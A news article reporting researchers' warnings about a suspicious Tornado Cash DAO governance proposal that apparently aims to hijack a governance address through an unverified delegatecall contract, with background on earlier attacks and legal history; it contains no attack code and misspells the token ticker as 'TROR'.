L2BEAT researcher Sergey Shemyakov posted on X on June 25, warning of a suspicious governance proposal in the Tornado Cash DAO: the target contract is unverified, and the proposer address received funds via Railgun. A security alliance researcher analyzed that the proposal aims to enable the attacker to control the governance address holding approximately $23 million worth of TROR tokens.
Technical Features of the Suspicious Proposal: Unverified Target Contract, Railgun Fund Source
(Source: Sergey Shemyakov)
Shemyakov listed three specific warnings in his post:
First, the target contract is unverified on Etherscan, which is "highly unusual" for Tornado Cash DAO proposals;
Second, if passed, the governance contract would delegatecall the target contract (delegatecall allows arbitrary code execution in the caller's context, a high-risk operation);
Third, the proposal creator address received funds via Railgun 4 days ago, while Railgun is a competing privacy protocol to Tornado Cash.
The proposal superficially claims to define a new fee structure and "establish a completely new dynamic deflationary economic model," but security researchers believe this is merely a cover.
Caversaccio's Analysis: Fake Address Replacement, $23 Million TROR Target
Pascal Caversaccio analyzed the proposal's true intent in detail:
· The proposal would replace a key address in the DAO governance contract with a fake address controlled by the attacker, where the first 15 characters are identical to the existing address (visually hard to distinguish);
· After replacement, the attacker would control the DAO governance address currently holding approximately $23 million worth of TROR tokens;
· A similar replacement would also be applied to the staking governance proxy contract;
· The fake governance address could also "arbitrarily clear the balance of any relayer."
Caversaccio urged all TROR holders to reject the proposal.
Tornado Cash Governance Attack History: Lessons from 2023
This is not the first time Tornado Cash has faced a malicious governance proposal. In 2023, a malicious proposal successfully passed, giving the attacker majority voting control; the attacker swapped approximately $800,000 worth of TROR tokens for ETH, then attempted to propose resetting TROR voting power to zero and laundering the proceeds through Tornado Cash.
Additionally, multiple IPFS front-ends of Tornado Cash were injected with malicious JavaScript code, leading to leakage of sensitive deposit information.
On the legal front, Tornado Cash was sanctioned by the U.S. Treasury in 2022, with the sanctions lifted last year; developer Roman Storm was indicted last year for conspiracy to operate an unlicensed money transmitting business, and a motion for acquittal filed in April this year remains undecided, leaving his fate uncertain.
Frequently Asked Questions
Why is an "unverified target contract" a major red flag in Tornado Cash DAO?
According to Shemyakov, Tornado Cash DAO proposals have historically used verified (open-source) contracts, allowing the community and researchers to review the proposal's actual functionality. An unverified contract means its code cannot be directly viewed and can only be analyzed through decompilation (reverse engineering), greatly increasing the difficulty of identifying malicious logic, and is therefore extremely rare in normal governance processes.
What is the danger of a delegatecall attack?
delegatecall is a low-level call method in Ethereum smart contracts that allows the called contract's code to execute in the storage context of the caller (in this case, the governance contract). This means that if the target contract contains malicious code, execution can modify all states held by the governance contract, including token balances and key addresses, and such modifications are irreversible.
Is Tornado Cash's mixer pool itself safe?
According to Shemyakov's explanation, Tornado Cash's mixing pool itself is not affected by this proposal; the pool is secure. The target of this proposal is the Tornado Cash DAO governance contract itself—the contract that manages organizational decisions—not the anonymity function contracts accessed by users.
